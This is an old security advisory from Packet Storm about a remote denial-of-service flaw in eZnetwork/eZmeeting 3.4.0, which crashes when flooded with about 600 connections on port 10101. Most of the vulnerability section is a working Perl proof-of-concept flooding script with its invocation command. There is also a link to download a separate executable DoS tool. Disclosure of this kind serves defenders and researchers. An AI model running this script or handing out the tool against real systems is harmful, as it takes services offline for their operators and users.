ez.txt

2004-09-09T00:00:00
ID PACKETSTORM:34263
Type packetstorm
Reporter Dr. Insane
Modified 2004-09-09T00:00:00

Description

                                        
                                            `  
Security Advisory  
  
  
  
Vulnerability: Eznetwork multiple connections Denial of service  
Packages : "eZ34.exe" and "eZphoto1.2.1.EXE"  
+ eZ  
+ eZphotoshare  
+ eZmeeting  
+ eZnetwork  
+ eZshare  
Software : www.eZmeeting.com  
[version 3.4.0]  
eZnet Modules:  
SwServer: 1.153  
SwEzModule.dll: 1.72  
SwLoginModule.dll: 1.94  
SwMetaObjectModule.dll: 1.46  
SwProxyModule.dll: 1.35  
SwShareModule.dll: 1.90  
SwStatusModule.dll: 1.41  
SwTransferModule.dll: 1.172  
  
Version : 3.4.0 and prior  
Vendor : eZnetwork  
Vendor Url : http://www.ezmeeting.com/Products.html  
Bug Type : Denial of service attack  
Severity : Medium (remote crash)  
Author: dr_insane , dr_insane@pathfinder.gr  
  
  
#################################################  
  
#################################################  
  
1. Description  
  
eZ:  
---  
"Imagine going to the movies, but instead of seeing the picture, someone had to  
describe it to you verbally. That's what's happening in countless business  
discussions and conference calls every day. A lot of time and money is being  
wasted. That's why we created eZ. Now imagine having the ability to  
place any document right in front of the person you’re speaking with on the  
phone, immediately - Word, Excel, PowerPoint, PDF, CAD, Digital Photos. Online.  
Real time. That's the power of eZ. Regardless of the distance that separates  
your team, eZ delivers an amazingly interactive, simple, visual workspace for  
all team players. If a picture paints a thousand words, think what an  
interactive picture can do for your business. Picture it with eZ."  
- Vendor's Description  
  
eZnetwork:  
----------  
"eZnetwork is a service that works hand in hand with the eZ desktop application.  
It allows users to connect with others (outside their Local Area Network) over  
the Internet, by using an eZ identity, or 'Friendly Name'. eZnetwork also allows  
users to host conferences and join conferences, even when one or more  
participants are located behind corporate firewalls, without compromising  
security."  
- Vendor's Description  
  
eZphotoshare:  
-------------  
"eZphotoshare is an amazing new way to share Digital Photos over the Internet  
with friends and family. Seeing is believing, download it today and  
interactively share digital photos anytime, anywhere. It's FREE for home use."  
- Vendor's Description  
  
  
2. Vulnerability Details  
The vulnerability is caused by an error in connection handling, which can be exploited to crash the  
server by establishing about 600 connections to port 10101.  
  
By executing the following code against Ez.exe (port 10101) the server will crash:  
  
-----------------------------------------------------------------  
  
"C:\Perl\bin\perl5.6.1.exe "C:\kill_ez.pl" 127.0.0.1 10101 600" |  
  
-----------------------------------------------------------------  
  
#!/usr/bin/perl  
  
use Strict;   
use Socket;  
use IO::Socket;  
  
my $host = $ARGV[0];  
my $port = $ARGV[1];  
my $stop = $ARGV[2];  
my $size = 1000;  
my $prot = getprotobyname('tcp');  
my $slep = $ARGV[3];  
  
printf("================================================\n");  
printf(" Eznetwork POC \n");  
printf("================================================\n");  
printf("[*] Making %d Connections To %s \n", $stop , $host);  
  
for ($i=1; $i<$stop; $i++)  
{  
socket($i, PF_INET, SOCK_STREAM, $prot );   
my $dest = sockaddr_in ($port, inet_aton($host));  
connect($i, $dest);  
}  
  
CheckServer($host, $i, $slep, $stop);  
KillThreads($stop);  
printf("[*] Exploit Attempt Unsuccesful");  
exit;  
  
sub CheckServer($host, $i, $slep, $stop) {  
($host, $i, $slep, $stop) = @_;  
$blank = "\015\012" x 2;  
$request = "GET / HTTP/1.0".$blank;  
$remote = IO::Socket::INET->new( Proto => "tcp",  
PeerAddr => $host,  
PeerPort => $port,  
Timeout => '10000',  
Type => SOCK_STREAM,  
);   
print $remote $request;  
unless ( <$remote> )  
{  
printf("[*] Host %s Has Been Successfully DoS'ed\n", $host);  
printf("[*] The Host Will Be Down For %d Seconds\n", $slep);  
sleep($slep);  
KillThreads($stop);  
exit;  
}  
}  
  
sub KillThreads($stop) {  
$stop = @_;  
printf("[*] Killing All active Connections");  
for ($l=1; $l<$stop; $l++) {  
shutdown($l,2)|| die("Couldn't Shut Down Socket");  
$l++;  
}  
}  
  
  
If you don't want to use this code you can download g0dzilla to test it:   
http://members.lycos.co.uk/r34ct/main/godzillaDosTool/upgrade_to_v02.exe  
  
  
Workaround:  
Use another product  
  
`